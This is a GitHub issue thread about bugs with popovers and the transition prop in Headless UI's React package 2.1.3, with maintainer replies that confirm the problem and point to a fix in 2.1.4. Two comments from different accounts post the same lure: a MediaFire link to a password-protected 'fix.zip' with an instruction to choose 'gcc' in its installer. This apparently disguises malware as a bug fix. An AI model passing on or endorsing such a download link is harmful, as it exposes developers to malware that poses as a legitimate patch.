### ISSUE TITLE
[2.1.3]: Popover issues with transition prop

### ISSUE THREAD

**Issue by Dragate** [tailwindlabs/headlessui#3438]
**What package within Headless UI are you using?**

@headlessui/react

**What version of that package are you using?**

2.1.3

**What browser are you using?**

Chrome

**Reproduction URL**

https://codesandbox.io/p/devbox/falling-sunset-24wzzr

**Describe your issue**

- **CloseButtons not closing the popover they are in.**
In the reproduction, press on Products and then, on Insights. The popover should have closed but did not, despite Insights being a CloseButton.

- **PopoverGroup not closing other open popovers they contain.**
In the reproduction, press on Products and then, on Solutions. The popover from Products should have closed but did not, despite being in the same PopoverGroup.

- **Unable to open/close popovers consistently.**
In the reproduction, keep clicking on Products and you'll notice its open/close state does not toggle consistently.

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Dragate** [comment]
Possible duplicate of #3437

**Comment by cod3blox** [comment]
Can confirm the same problems. Compared to 2.1.2, it seeems that the portal of the popup does not get removed on close.

**Comment by M4RC0Sx** [comment]
Same here

**Comment by reinink** [comment]
Hey folks, thanks for reporting this! I am able to reproduce this using a Tailwind UI component (see below). I recommend sticking to `2.1.2` until we've got this figured out 👍

https://github.com/user-attachments/assets/b304c762-f5bf-4798-81af-5ce27a15a18d

**Comment by M4RC0Sx** [comment]
> Hey folks, thanks for reporting this! I am able to reproduce this using a Tailwind UI component (see below). I recommend sticking to `2.1.2` until we've got this figured out 👍
> 
> 
> 
> https://github.com/user-attachments/assets/b304c762-f5bf-4798-81af-5ce27a15a18d

Hi! But the issue I opened that happens when you spam-click the button happens on 2.1.2 too. It is not the same issue and I think it should be reopened

**Comment by RobinMalfait** [comment]
Hey!

This should be fixed by #3448, and will be available in the next release ([2.1.4](https://github.com/tailwindlabs/headlessui/releases/tag/%40headlessui%2Freact%40v2.1.4)).

You can already try it using:
- `npm install @headlessui/react@insiders`.
